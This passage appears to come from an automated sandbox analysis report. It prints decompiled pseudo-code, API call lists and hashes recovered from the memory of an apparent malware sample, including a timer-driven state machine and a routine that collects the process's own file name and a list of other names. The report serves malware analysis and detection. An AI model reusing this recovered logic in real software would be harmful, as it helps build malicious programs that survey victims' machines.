                                                                                        								_push(_t105);
                                                                                        								if(E00D11D40( &_v60) != 0) {
                                                                                        									if(E00D11E50( &_v60,  &_v12,  &_v8) != 0) {
                                                                                        										if(E00D12530( &_v12,  &_v20) != 0) {
                                                                                        											_t92 = _v20;
                                                                                        											_t79 =  *_t92;
                                                                                        											 *_t83 = _t79;
                                                                                        											if(_t79 < 0x4000000) {
                                                                                        												_t82 = E00D184C0(_t92 + 4, _v16 - 4, _t83);
                                                                                        												_t92 = _v20;
                                                                                        												 *_t103 = _t82;
                                                                                        											}
                                                                                        											HeapFree(GetProcessHeap(), 0, _t92);
                                                                                        										}
                                                                                        										HeapFree(GetProcessHeap(), 0, _v12);
                                                                                        									}
                                                                                        									 *0xd1c234(_v52);
                                                                                        								}
                                                                                        								 *0xd1c234(_v56);
                                                                                        								 *0xd1c234(_v60);
                                                                                        							}
                                                                                        							HeapFree(GetProcessHeap(), 0, 0);
                                                                                        							HeapFree(GetProcessHeap(), 0, _t105);
                                                                                        						}
                                                                                        						HeapFree(GetProcessHeap(), 0, _v40);
                                                                                        					}
                                                                                        					HeapFree(GetProcessHeap(), 0, _v28);
                                                                                        				}
                                                                                        				return 0 |  *_t103 != 0x00000000;
                                                                                        			}


























                                                                                        0x00d18538
                                                                                        0x00d1853f
                                                                                        0x00d18544
                                                                                        0x00d1854a
                                                                                        0x00d1854d
                                                                                        0x00d18550
                                                                                        0x00d18556
                                                                                        0x00d1855e
                                                                                        0x00d18571
                                                                                        0x00d18588
                                                                                        0x00d185a1
                                                                                        0x00d185a6
                                                                                        0x00d185ac
                                                                                        0x00d185cc
                                                                                        0x00d185df
                                                                                        0x00d185e5
                                                                                        0x00d185f0
                                                                                        0x00d185f9
                                                                                        0x00d185fe
                                                                                        0x00d18606
                                                                                        0x00d1860c
                                                                                        0x00d18612
                                                                                        0x00d18620
                                                                                        0x00d18636
                                                                                        0x00d18649
                                                                                        0x00d1864b
                                                                                        0x00d1864e
                                                                                        0x00d18650
                                                                                        0x00d18657
                                                                                        0x00d18663
                                                                                        0x00d18668
                                                                                        0x00d1866e
                                                                                        0x00d1866e
                                                                                        0x00d1867a
                                                                                        0x00d1867a
                                                                                        0x00d1868c
                                                                                        0x00d1868c
                                                                                        0x00d18695
                                                                                        0x00d18695
                                                                                        0x00d1869e
                                                                                        0x00d186a7
                                                                                        0x00d186a7
                                                                                        0x00d186b8
                                                                                        0x00d186c8
                                                                                        0x00d186c8
                                                                                        0x00d186da
                                                                                        0x00d186da
                                                                                        0x00d186ec
                                                                                        0x00d186ec
                                                                                        0x00d186ff

                                                                                        APIs
                                                                                          • Part of subcall function 00D18420: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,000DBBA0), ref: 00D18468
                                                                                          • Part of subcall function 00D18420: RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 00D1846F
                                                                                          • Part of subcall function 00D18420: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,000DBBA0), ref: 00D18493
                                                                                          • Part of subcall function 00D18420: HeapFree.KERNEL32(00000000,?,000DBBA0,?,000DBBA0), ref: 00D1849A
                                                                                          • Part of subcall function 00D18700: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,00D1856F), ref: 00D18746
                                                                                          • Part of subcall function 00D18700: RtlAllocateHeap.NTDLL(00000000), ref: 00D1874D
                                                                                          • Part of subcall function 00D18700: memcpy.NTDLL(00000000,?,?), ref: 00D187A9
                                                                                        • _snwprintf.NTDLL ref: 00D185CC
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00D185D8
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D185DF
                                                                                          • Part of subcall function 00D11C50: memset.NTDLL ref: 00D11C70
                                                                                          • Part of subcall function 00D11C50: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D11C9C
                                                                                          • Part of subcall function 00D11C50: GetProcessHeap.KERNEL32(00000008,00000000), ref: 00D11CAE
                                                                                          • Part of subcall function 00D11C50: RtlAllocateHeap.NTDLL(00000000), ref: 00D11CB5
                                                                                          • Part of subcall function 00D11C50: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D11CD0
                                                                                          • Part of subcall function 00D11C50: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D11CED
                                                                                          • Part of subcall function 00D11C50: HeapFree.KERNEL32(00000000), ref: 00D11CF4
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00D18673
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D1867A
                                                                                          • Part of subcall function 00D184C0: GetProcessHeap.KERNEL32(00000000,00D18668,?,?,?,00D18668,?), ref: 00D184D5
                                                                                          • Part of subcall function 00D184C0: RtlAllocateHeap.NTDLL(00000000), ref: 00D184DC
                                                                                          • Part of subcall function 00D184C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D184FF
                                                                                          • Part of subcall function 00D184C0: HeapFree.KERNEL32(00000000), ref: 00D18506
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00D18685
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D1868C
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D186B1
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D186B8
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00D186C1
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D186C8
                                                                                          • Part of subcall function 00D11D40: GetProcessHeap.KERNEL32(00000000,00000000,?,00D1861B), ref: 00D11DA2
                                                                                          • Part of subcall function 00D11D40: HeapFree.KERNEL32(00000000,?,00D1861B), ref: 00D11DA9
                                                                                          • Part of subcall function 00D11E50: GetProcessHeap.KERNEL32(00000000,?,?,?,?,00D18631), ref: 00D11E89
                                                                                          • Part of subcall function 00D11E50: RtlAllocateHeap.NTDLL(00000000), ref: 00D11E90
                                                                                          • Part of subcall function 00D11E50: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D11EFB
                                                                                          • Part of subcall function 00D11E50: HeapFree.KERNEL32(00000000), ref: 00D11F02
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00D186D3
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D186DA
                                                                                          • Part of subcall function 00D11830: GetProcessHeap.KERNEL32(00000008,00D19F6B,00000000,00000000,00D11004,?,00D115F4,4DBAC13F,00D19F6B,?,00000000), ref: 00D11844
                                                                                          • Part of subcall function 00D11830: RtlAllocateHeap.NTDLL(00000000,?,00D115F4), ref: 00D1184B
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00D186E5
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D186EC
                                                                                          • Part of subcall function 00D123F0: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?), ref: 00D12422
                                                                                          • Part of subcall function 00D123F0: RtlAllocateHeap.NTDLL(00000000), ref: 00D12429
                                                                                          • Part of subcall function 00D123F0: memcpy.NTDLL(00D18583,?,?), ref: 00D12467
                                                                                          • Part of subcall function 00D123F0: GetProcessHeap.KERNEL32(00000000,00D18583), ref: 00D1250A
                                                                                          • Part of subcall function 00D123F0: HeapFree.KERNEL32(00000000), ref: 00D12511
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$Free$Allocate$ByteCharMultiWidememcpy$_snwprintfmemset
                                                                                        • String ID:
                                                                                        • API String ID: 876682111-0
                                                                                        • Opcode ID: f707354aed2bed46e9adbae62398b3f755893461ff965ff29009ee0a743ec6e7
                                                                                        • Instruction ID: 3ca785f368897cc7ca6e692c2871371df29563a36bca42b69f7955d591f52268
                                                                                        • Opcode Fuzzy Hash: f707354aed2bed46e9adbae62398b3f755893461ff965ff29009ee0a743ec6e7
                                                                                        • Instruction Fuzzy Hash: 3E510971990205BFEB00DBA4EC49BEA7B79EF08305F048450FA05D62A1EF319A95CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        C-Code - Quality: 91%
                                                                                        			E00D18DD0(void* __edx) {
                                                                                        				void* _v16;
                                                                                        				void* _v24;
                                                                                        				char _v28;
                                                                                        				void* _v32;
                                                                                        				char _v36;
                                                                                        				intOrPtr _v44;
                                                                                        				void* _v52;
                                                                                        				intOrPtr _v56;
                                                                                        				intOrPtr _v60;
                                                                                        				intOrPtr _v64;
                                                                                        				intOrPtr _v68;
                                                                                        				long _v72;
                                                                                        				void* _v76;
                                                                                        				void* _v84;
                                                                                        				void* _v92;
                                                                                        				signed int _t28;
                                                                                        				long _t29;
                                                                                        
                                                                                        				_t28 = GetTickCount();
                                                                                        				if(_t28 <  *0xd1c278) {
                                                                                        					L24:
                                                                                        					return _t28;
                                                                                        				} else {
                                                                                        					_t29 =  *0xd1c280; // 0x0
                                                                                        					_t28 = _t29 - 1;
                                                                                        					if(_t28 > 3) {
                                                                                        						goto L24;
                                                                                        					} else {
                                                                                        						switch( *((intOrPtr*)(_t28 * 4 +  &M00D19044))) {
                                                                                        							case 0:
                                                                                        								 *0xd1c280 = 2;
                                                                                        								return _t28;
                                                                                        								goto L25;
                                                                                        							case 1:
                                                                                        								 *0xd1c280 = 0;
                                                                                        								__eax = E00D19620(__ecx, __edx);
                                                                                        								__eax = __eax;
                                                                                        								if(__eax == 0) {
                                                                                        									 *0xd1c280 = 3;
                                                                                        									_pop(__esi);
                                                                                        									return __eax;
                                                                                        								} else {
                                                                                        									if(__eax != 0) {
                                                                                        										goto L24;
                                                                                        									} else {
                                                                                        										__eax = SetEvent( *0xd1c29c);
                                                                                        										_pop(__esi);
                                                                                        										return __eax;
                                                                                        									}
                                                                                        								}
                                                                                        								goto L25;
                                                                                        							case 2:
                                                                                        								 *0xd1c280 = 0;
                                                                                        								 *0xd1c294 = 0xd11270;
                                                                                        								 *0xd1c298 = 0xd11270;
                                                                                        								__eax = E00D122E0();
                                                                                        								__eax =  *0xd1c02c; // 0xd112f8
                                                                                        								 *0xd1c26c = __eax;
                                                                                        								__eax =  *0xd1c030; // 0x6a
                                                                                        								 *0xd1c268 = 0xd1c2a8;
                                                                                        								 *0xd1c270 = __eax;
                                                                                        								 *0xd1c280 = 4;
                                                                                        								_pop(__esi);
                                                                                        								return __eax;
                                                                                        								goto L25;
                                                                                        							case 3:
                                                                                        								__ecx =  &_v28;
                                                                                        								 *0xd1c280 = 0;
                                                                                        								__eax = E00D18BB0( &_v28);
                                                                                        								__ecx =  &_v36;
                                                                                        								__eax = E00D18D50( &_v36);
                                                                                        								__eax =  *0xd1cbd0; // 0x0
                                                                                        								_push(0xd1c2a8);
                                                                                        								_v32 = __eax;
                                                                                        								_v44 = 0xd1c2a8;
                                                                                        								_v44 =  *0xd1c1e4();
                                                                                        								__eax =  *0xd1c2a4; // 0x0
                                                                                        								_v52 = __eax;
                                                                                        								do {
                                                                                        									__ecx =  &_v24;
                                                                                        									__esi = 0xdbba0;
                                                                                        									__eax = E00D18920( &_v24);
                                                                                        									__ecx =  &_v16;
                                                                                        									__eax = E00D1A7A0( &_v16);
                                                                                        									__edx =  &_v52;
                                                                                        									__ecx =  &_v84;
                                                                                        									if(E00D19F80( &_v84,  &_v52) != 0) {
                                                                                        										 &_v92 =  &_v84;
                                                                                        										if(E00D18520( &_v84,  &_v92) == 0) {
                                                                                        											__eax =  *0xd1c298; // 0x0
                                                                                        											__esi = 0x7530;
                                                                                        											__eax = __eax + 8;
                                                                                        											 *0xd1c298 = __eax;
                                                                                        											 *0xd1c298 = __eax;
                                                                                        										} else {
                                                                                        											__eax = E00D199A0();
                                                                                        											__ecx = 0;
                                                                                        											__eax = E00D188B0(0);
                                                                                        											__ecx = 0;
                                                                                        											__eax = E00D1A750(0);
                                                                                        											__edx =  &_v76;
                                                                                        											__ecx =  &_v92;
                                                                                        											if(E00D1A180( &_v92,  &_v76) != 0) {
                                                                                        												__eax = E00D11750();
                                                                                        												__edx = _v72;
                                                                                        												if(__edx != 0) {
                                                                                        													__ecx = _v76;
                                                                                        													__eax = E00D19A90(_v76, __edx);
                                                                                        												}
                                                                                        												__eax = E00D11750();
                                                                                        												__edx = _v64;
                                                                                        												if(__edx != 0) {
                                                                                        													__ecx = _v68;
                                                                                        													__eax = E00D18990(_v68, __edx);
                                                                                        													__esi = 0;
                                                                                        												}
                                                                                        												__eax = E00D11750();
                                                                                        												__edx = _v56;
                                                                                        												if(__edx != 0) {
                                                                                        													__ecx = _v60;
                                                                                        													__eax = E00D1A810(_v60, __edx);
                                                                                        													__esi = 0;
                                                                                        												}
                                                                                        											}
                                                                                        											GetProcessHeap() = HeapFree(__eax, 0, _v92);
                                                                                        										}
                                                                                        										GetProcessHeap() = HeapFree(__eax, 0, _v84);
                                                                                        									}
                                                                                        									GetProcessHeap() = HeapFree(__eax, 0, _v24);
                                                                                        									GetProcessHeap() = HeapFree(__eax, 0, _v16);
                                                                                        								} while (__esi == 0);
                                                                                        								__eax = GetTickCount();
                                                                                        								__eax = __eax + __esi;
                                                                                        								 *0xd1c280 = 4;
                                                                                        								 *0xd1c278 = __eax;
                                                                                        								GetProcessHeap() = HeapFree(__eax, 0, _v32);
                                                                                        								goto L24;
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        				L25:
                                                                                        			}




















                                                                                        0x00d18dda
                                                                                        0x00d18de6
                                                                                        0x00d1903d
                                                                                        0x00d19041
                                                                                        0x00d18dec
                                                                                        0x00d18dec
                                                                                        0x00d18df1
                                                                                        0x00d18df5
                                                                                        0x00000000
                                                                                        0x00d18dfb
                                                                                        0x00d18dfb
                                                                                        0x00000000
                                                                                        0x00d18e02
                                                                                        0x00d18e10
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d18e13
                                                                                        0x00d18e1d
                                                                                        0x00d18e22
                                                                                        0x00d18e25
                                                                                        0x00d18e41
                                                                                        0x00d18e4b
                                                                                        0x00d18e4f
                                                                                        0x00d18e27
                                                                                        0x00d18e28
                                                                                        0x00000000
                                                                                        0x00d18e2e
                                                                                        0x00d18e34
                                                                                        0x00d18e3a
                                                                                        0x00d18e3e
                                                                                        0x00d18e3e
                                                                                        0x00d18e28
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d18e52
                                                                                        0x00d18e5c
                                                                                        0x00d18e66
                                                                                        0x00d18e70
                                                                                        0x00d18e75
                                                                                        0x00d18e7a
                                                                                        0x00d18e7f
                                                                                        0x00d18e84
                                                                                        0x00d18e8e
                                                                                        0x00d18e93
                                                                                        0x00d18e9d
                                                                                        0x00d18ea1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d18ea4
                                                                                        0x00d18ea8
                                                                                        0x00d18eb2
                                                                                        0x00d18eb7
                                                                                        0x00d18ebb
                                                                                        0x00d18ec0
                                                                                        0x00d18ec5
                                                                                        0x00d18eca
                                                                                        0x00d18ece
                                                                                        0x00d18edc
                                                                                        0x00d18ee0
                                                                                        0x00d18ee8
                                                                                        0x00d18ef0
                                                                                        0x00d18ef0
                                                                                        0x00d18ef4
                                                                                        0x00d18ef9
                                                                                        0x00d18efe
                                                                                        0x00d18f02
                                                                                        0x00d18f07
                                                                                        0x00d18f0b
                                                                                        0x00d18f16
                                                                                        0x00d18f21
                                                                                        0x00d18f30
                                                                                        0x00d18fb1
                                                                                        0x00d18fb6
                                                                                        0x00d18fbb
                                                                                        0x00d18fbe
                                                                                        0x00d18fcd
                                                                                        0x00d18f32
                                                                                        0x00d18f32
                                                                                        0x00d18f37
                                                                                        0x00d18f39
                                                                                        0x00d18f3e
                                                                                        0x00d18f40
                                                                                        0x00d18f45
                                                                                        0x00d18f49
                                                                                        0x00d18f54
                                                                                        0x00d18f56
                                                                                        0x00d18f5b
                                                                                        0x00d18f61
                                                                                        0x00d18f63
                                                                                        0x00d18f67
                                                                                        0x00d18f67
                                                                                        0x00d18f6c
                                                                                        0x00d18f71
                                                                                        0x00d18f77
                                                                                        0x00d18f79
                                                                                        0x00d18f7d
                                                                                        0x00d18f82
                                                                                        0x00d18f82
                                                                                        0x00d18f84
                                                                                        0x00d18f89
                                                                                        0x00d18f8f
                                                                                        0x00d18f91
                                                                                        0x00d18f95
                                                                                        0x00d18f9a
                                                                                        0x00d18f9a
                                                                                        0x00d18f8f
                                                                                        0x00d18fa9
                                                                                        0x00d18fa9
                                                                                        0x00d18fdf
                                                                                        0x00d18fdf
                                                                                        0x00d18ff2
                                                                                        0x00d19005
                                                                                        0x00d1900b
                                                                                        0x00d19013
                                                                                        0x00d1901d
                                                                                        0x00d1901f
                                                                                        0x00d1902b
                                                                                        0x00d19037
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d18dfb
                                                                                        0x00d18df5
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00D18DDA
                                                                                        • SetEvent.KERNEL32 ref: 00D18E34
                                                                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00D1C2A8), ref: 00D18ED6
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00D18FA2
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D18FA9
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00D18FD8
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D18FDF
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00D18FEB
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D18FF2
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00D18FFE
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D19005
                                                                                        • GetTickCount.KERNEL32 ref: 00D19013
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00D19030
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D19037
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeProcess$CountTick$Eventlstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 1747682351-0
                                                                                        • Opcode ID: 3a0a52671c4bbb28862e9512342a3e5000d89c4d8d0715dbeb5078665e722b2a
                                                                                        • Instruction ID: d0b6e9d7356b7f7ed83d7130901602ecdb40c6be83b5215e0f583a742b593b12
                                                                                        • Opcode Fuzzy Hash: 3a0a52671c4bbb28862e9512342a3e5000d89c4d8d0715dbeb5078665e722b2a
                                                                                        • Instruction Fuzzy Hash: 905188725A4300BFD710EFA4F84AADABBA5FB44300F049609F944C2361DF758986DBB6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 382 d18bb0-d18c0c GetModuleFileNameW lstrlenW 383 d18c28-d18c35 call d12110 382->383 384 d18c0e 382->384 390 d18c37-d18c39 383->390 391 d18c58-d18c72 GetProcessHeap RtlAllocateHeap 383->391 385 d18c10-d18c14 384->385 388 d18c25 385->388 389 d18c16-d18c21 385->389 388->383 389->385 392 d18c23 389->392 393 d18c40-d18c51 lstrlenW 390->393 394 d18c78-d18c7d 391->394 395 d18d3a-d18d4a 391->395 392->383 393->393 396 d18c53-d18c56 393->396 397 d18cc4-d18cdc WideCharToMultiByte 394->397 398 d18c7f 394->398 396->391 400 d18d15-d18d39 GetProcessHeap HeapFree 397->400 401 d18cde-d18cf2 GetProcessHeap RtlAllocateHeap 397->401 399 d18c80-d18c8d lstrcmpiW 398->399 402 d18cbb 399->402 403 d18c8f-d18cb9 lstrcpyW lstrlenW 399->403 401->400 404 d18cf4-d18d11 WideCharToMultiByte 401->404 405 d18cbe-d18cc2 402->405 403->405 404->400 406 d18d13 404->406 405->397 405->399 406->400
                                                                                        C-Code - Quality: 100%
                                                                                        			E00D18BB0(char** __ecx) {
                                                                                        				short* _v8;
                                                                                        				long _v12;
                                                                                        				char** _v16;
                                                                                        				int* _v20;
                                                                                        				short _v540;
                                                                                        				char** _t39;
                                                                                        				short* _t49;
                                                                                        				int* _t61;
                                                                                        				int _t71;
                                                                                        				int _t73;
                                                                                        				signed int _t74;
                                                                                        				short* _t75;
                                                                                        				intOrPtr* _t80;
                                                                                        				long _t82;
                                                                                        				int _t83;
                                                                                        				char** _t84;
                                                                                        				WCHAR* _t86;
                                                                                        				char* _t87;
                                                                                        
                                                                                        				_v12 = 0;
                                                                                        				_t73 = 0;
                                                                                        				_v16 = __ecx;
                                                                                        				 *__ecx = 0;
                                                                                        				_t39 =  &(__ecx[1]);
                                                                                        				_v20 = _t39;
                                                                                        				_v8 = 0;
                                                                                        				 *_t39 = 0;
                                                                                        				GetModuleFileNameW(0,  &_v540, 0x104);
                                                                                        				_t86 =  &(( &_v540)[lstrlenW( &_v540)]);
                                                                                        				if(_t86 >  &_v540) {
                                                                                        					while( *_t86 != 0x5c) {
                                                                                        						_t86 = _t86 - 2;
                                                                                        						if(_t86 >  &_v540) {
                                                                                        							continue;
                                                                                        						} else {
                                                                                        						}
                                                                                        						goto L6;
                                                                                        					}
                                                                                        					_t86 =  &(_t86[1]);
                                                                                        				}
                                                                                        				L6:
                                                                                        				E00D12110( &_v12);
                                                                                        				_t80 = _v12;
                                                                                        				if(_t80 != 0) {
                                                                                        					_t75 = 0;
                                                                                        					do {
                                                                                        						_t14 = _t80 + 4; // 0x4
                                                                                        						_t71 = lstrlenW(_t14);
                                                                                        						_t80 =  *_t80;
                                                                                        						_t75 = _t75 + 1 + _t71;
                                                                                        					} while (_t80 != 0);
                                                                                        					_v8 = _t75;
                                                                                        					_t73 = 0;
                                                                                        				}
                                                                                        				_t49 = RtlAllocateHeap(GetProcessHeap(), 8, _v8 + _v8);
                                                                                        				_v8 = _t49;
                                                                                        				if(_t49 == 0) {
                                                                                        					return 0 |  *_v16 != 0x00000000;
                                                                                        				} else {
                                                                                        					_t82 = _v12;
                                                                                        					while(_t82 != 0) {
                                                                                        						_t19 = _t82 + 4; // 0x4
                                                                                        						if(lstrcmpiW(_t19, _t86) == 0) {
                                                                                        							_t49 = _v8;
                                                                                        						} else {
                                                                                        							_t20 = _t82 + 4; // 0x4
                                                                                        							lstrcpyW( &(_v8[_t73]), _t20);
                                                                                        							_t24 = _t82 + 4; // 0x4
                                                                                        							_t74 = _t73 + lstrlenW(_t24);
                                                                                        							_t49 = _v8;
                                                                                        							_t49[_t74] = 0x2c;
                                                                                        							_t73 = _t74 + 1;
                                                                                        						}
                                                                                        						_t82 =  *_t82;
                                                                                        					}
                                                                                        					_t87 = 0;
                                                                                        					_t83 = WideCharToMultiByte(0xfde9, 0, _t49, _t73, 0, 0, 0, 0);
                                                                                        					if(_t83 != 0) {
                                                                                        						_t87 = RtlAllocateHeap(GetProcessHeap(), 8, _t83);
                                                                                        						if(_t87 != 0) {
                                                                                        							WideCharToMultiByte(0xfde9, 0, _v8, _t73, _t87, _t83, 0, 0);
                                                                                        							_t61 = _v20;
                                                                                        							if(_t61 != 0) {
                                                                                        								 *_t61 = _t83;
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        					_t84 = _v16;
                                                                                        					 *_t84 = _t87;
                                                                                        					HeapFree(GetProcessHeap(), 0, _v8);
                                                                                        					return 0 |  *_t84 != 0x00000000;
                                                                                        				}
                                                                                        			}





















                                                                                        0x00d18bbc
                                                                                        0x00d18bc3
                                                                                        0x00d18bc5
                                                                                        0x00d18bca
                                                                                        0x00d18bcc
                                                                                        0x00d18bcf
                                                                                        0x00d18bd7
                                                                                        0x00d18bde
                                                                                        0x00d18be8
                                                                                        0x00d18c01
                                                                                        0x00d18c0c
                                                                                        0x00d18c10
                                                                                        0x00d18c16
                                                                                        0x00d18c21
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d18c23
                                                                                        0x00000000
                                                                                        0x00d18c21
                                                                                        0x00d18c25
                                                                                        0x00d18c25
                                                                                        0x00d18c28
                                                                                        0x00d18c2b
                                                                                        0x00d18c30
                                                                                        0x00d18c35
                                                                                        0x00d18c37
                                                                                        0x00d18c40
                                                                                        0x00d18c40
                                                                                        0x00d18c44
                                                                                        0x00d18c4a
                                                                                        0x00d18c4d
                                                                                        0x00d18c4f
                                                                                        0x00d18c53
                                                                                        0x00d18c56
                                                                                        0x00d18c56
                                                                                        0x00d18c67
                                                                                        0x00d18c6d
                                                                                        0x00d18c72
                                                                                        0x00d18d4a
                                                                                        0x00d18c78
                                                                                        0x00d18c78
                                                                                        0x00d18c7d
                                                                                        0x00d18c80
                                                                                        0x00d18c8d
                                                                                        0x00d18cbb
                                                                                        0x00d18c8f
                                                                                        0x00d18c8f
                                                                                        0x00d18c9a
                                                                                        0x00d18ca0
                                                                                        0x00d18caa
                                                                                        0x00d18cb1
                                                                                        0x00d18cb4
                                                                                        0x00d18cb8
                                                                                        0x00d18cb8
                                                                                        0x00d18cbe
                                                                                        0x00d18cc0
                                                                                        0x00d18cc4
                                                                                        0x00d18cd8
                                                                                        0x00d18cdc
                                                                                        0x00d18cee
                                                                                        0x00d18cf2
                                                                                        0x00d18d06
                                                                                        0x00d18d0c
                                                                                        0x00d18d11
                                                                                        0x00d18d13
                                                                                        0x00d18d13
                                                                                        0x00d18d11
                                                                                        0x00d18cf2
                                                                                        0x00d18d15
                                                                                        0x00d18d1d
                                                                                        0x00d18d26
                                                                                        0x00d18d39
                                                                                        0x00d18d39

                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00D18BE8
                                                                                        • lstrlenW.KERNEL32(?), ref: 00D18BF5
                                                                                        • lstrlenW.KERNEL32(00000004), ref: 00D18C44
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00D18C60
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00D18C67
                                                                                        • lstrcmpiW.KERNEL32(00000004,?), ref: 00D18C85
                                                                                        • lstrcpyW.KERNEL32(00000000,00000004), ref: 00D18C9A
                                                                                        • lstrlenW.KERNEL32(00000004), ref: 00D18CA4
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D18CD2
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00D18CE1
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00D18CE8
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D18D06
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D18D1F
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D18D26
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Processlstrlen$AllocateByteCharMultiWide$FileFreeModuleNamelstrcmpilstrcpy
                                                                                        • String ID:
                                                                                        • API String ID: 2501218360-0
                                                                                        • Opcode ID: 156d81f9ad447a7024bd12d74c561544443d67edb3ef323bf8b69bb883ca0609
                                                                                        • Instruction ID: 142c8606f0baf2dc0f93e46e1f5194ade4057697392aa7e625b5311195e3c722
                                                                                        • Opcode Fuzzy Hash: 156d81f9ad447a7024bd12d74c561544443d67edb3ef323bf8b69bb883ca0609
                                                                                        • Instruction Fuzzy Hash: 87514E72981319BFDB20DFA4EC88ADABBB9EF44710F194465E905D7250EF309981DBB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        C-Code - Quality: 100%
                                                                                        			E00D1A690(void* __ecx) {
                                                                                        				void* _t15;
                                                                                        				void* _t22;
                                                                                        				void _t25;
                                                                                        				void* _t29;
                                                                                        				void* _t31;
                                                                                        				void* _t32;
                                                                                        				void* _t33;
                                                                                        
                                                                                        				_t31 = __ecx;
